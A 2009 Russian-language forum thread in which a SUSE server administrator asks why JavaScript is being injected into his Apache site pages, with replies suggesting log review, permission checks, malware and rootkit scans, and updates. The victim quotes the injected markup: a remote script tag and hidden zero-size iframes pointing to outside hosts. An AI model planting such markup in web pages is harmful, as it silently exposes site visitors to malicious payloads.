Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Linux и FreeBSD » Общий по Linux » Suse/OpenSuSE - Вирусня под Suse

Ответить
Настройки темы
Suse/OpenSuSE - Вирусня под Suse

Аватара для Surround

Ветеран


Сообщения: 908
Благодарности: 20

Профиль | Отправить PM | Цитировать


Стоит инет-сервак под Suse Linux Enterprice с апачем, как водится. Так вот, повелась там какая-то зараза вредная. Пишет свой ява-код вида
Цитата:
<script language="JavaScript" src="http://195.189.227.58/top100_00.js"></script>
и прочее, вплоть до процедур на ява-скрипте в вайлы сайтов, лежащих в /srv/www, причем разборчиво: только в страницы с содержанием в имени слов main или index.
что это может быть, куда копать?
На сервере еще есть папка для фтп-закачек, там полно, конечно, вирусни, но она виндовая

Отправлено: 21:14, 06-06-2009

 

Ветеран


Сообщения: 716
Благодарности: 55

Профиль | Отправить PM | Цитировать


Смотрите логи апача, кто там с этого адреса к вам лазает. Самое простое - заблокировать его.
Ну, а по большому счету нужно проверять ваш код и права доступа к содержимому. Заодно и ftp проверьте, не дает ли он легкий доступ к содержимому вашего www.

Отправлено: 09:36, 08-06-2009 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Аватара для Surround

Ветеран


Сообщения: 908
Благодарности: 20

Профиль | Отправить PM | Цитировать


извиняюсь за долгое пропадание
вот проблема снова проявилась, и есть чего показать.
Цитата:
<iframe src="http://ruoo.info" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://klinoneshoes.info" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://165.194.30.123/qwerty/1/index.php" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://bananm.net" width=0 height=0 frameborder=0></iframe>
выглядит оно примерно таким образом (я имею в виду зараза). Провелир логи - нет запросов с этих адресов.
Самое занятное, что писать в этот файл (index.php, в нем было найдено) может только root. Пароль не элементарный, менял.

Отправлено: 18:49, 13-07-2009 | #3


Ветеран


Сообщения: 623
Благодарности: 14

Профиль | Отправить PM | Цитировать


Surround
а обновленным clamav не пробЫвали просканить весь /

Отправлено: 17:21, 14-07-2009 | #4


Аватара для [mzd]

Линуксоид-стакановец


Сообщения: 2391
Благодарности: 186

Профиль | Отправить PM | Цитировать


Попробуйте задать вопрос в разделе Информационная безопасность. Если не помогут, то рекомендую обратиться на форум разработчиков антивирусных программ, например, Dr. Web или Касперского. У них больше опыта

-------
Живя в реальном мире, стремись к невероятному... Эрнесто Че Гевара
Everybody lies. (c) House M.D.
Базовая настройка Ubuntu. Документация для новичка.
Руководство по установке, начальной настройке и основам использования операционной системы Ubuntu


Отправлено: 17:43, 14-07-2009 | #5


Аватара для lxa85

Необычный


Contributor


Сообщения: 4462
Благодарности: 994

Профиль | Сайт | Отправить PM | Цитировать


Surround, какая версия Апача? Быть может он подвергается атаке и повышает свои права до уровня системы? Хотя не должен. Надо подумать, как это происходит, но ответ пока прежний - установить акутальные обновления.

-------
- Я не разрешаю тебе быть плохой! Потому что плохие люди совершают плохие поступки. А это нехорошо!
(Из наставлений 5 летней девочки своей младшей сестре)


Отправлено: 18:00, 14-07-2009 | #6

mar mar вне форума

Аватара для mar

just mar


Moderator


Сообщения: 3904
Благодарности: 163

Профиль | Отправить PM | Цитировать


ну проблема не в вирусе - тут никаких следов пребывания нет, а во взломе Вашего сервера. Надо очень внимательно проверять измененнные файлы (и по времени, и по размеру). И все возможные логи.
Что значит в index.php может писать только root?? Вы пускаете его по ftp? Или редактируете файлы только по ssh?

Отправлено: 18:54, 14-07-2009 | #7


Аватара для Surround

Ветеран


Сообщения: 908
Благодарности: 20

Профиль | Отправить PM | Цитировать


Цитата mar:
Что значит в index.php может писать только root?? »
в том плане, что chmod стоит 755.
попробую посканить

Отправлено: 00:53, 18-07-2009 | #8


Аватара для sergleo

Старожил


Сообщения: 178
Благодарности: 4

Профиль | Отправить PM | Цитировать


Проверьте с помощью http://www.chkrootkit.org/,

Интересно, вы пускаете свой веб сервер под рутом? или под системным юзером www? Используйте для веб сервера chroot.

-------
Best regard`s SergLeo


Отправлено: 09:50, 21-07-2009 | #9


Странный тип


Сообщения: 813
Благодарности: 73

Профиль | Отправить PM | Цитировать


Установи пакет seccheck.

-------
Сколько не думай, а лучше водки ничего не придумаешь.


Отправлено: 11:05, 21-07-2009 | #10



Компьютерный форум OSzone.net » Linux и FreeBSD » Общий по Linux » Suse/OpenSuSE - Вирусня под Suse

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
вирусня в расшаренных папках по сети reddenya Лечение систем от вредоносных программ 3 13-11-2009 13:31
нет из под Suse Linux AnGel_of_Death Программное обеспечение Linux и FreeBSD 7 28-08-2006 15:56
аналог ICQ под SuSE 10.0, который бы корректно работал с кирилицей mistivid Программное обеспечение Linux и FreeBSD 8 12-07-2006 09:36
Установка модема Motorola SM56 под Linux SuSE 9.2 Prof B_H Железо в Linux 11 26-05-2005 21:29
SuSE 9.2 - как запустить VPN не из под ROOT somathi Общий по Linux 6 03-04-2005 19:13




 
Переход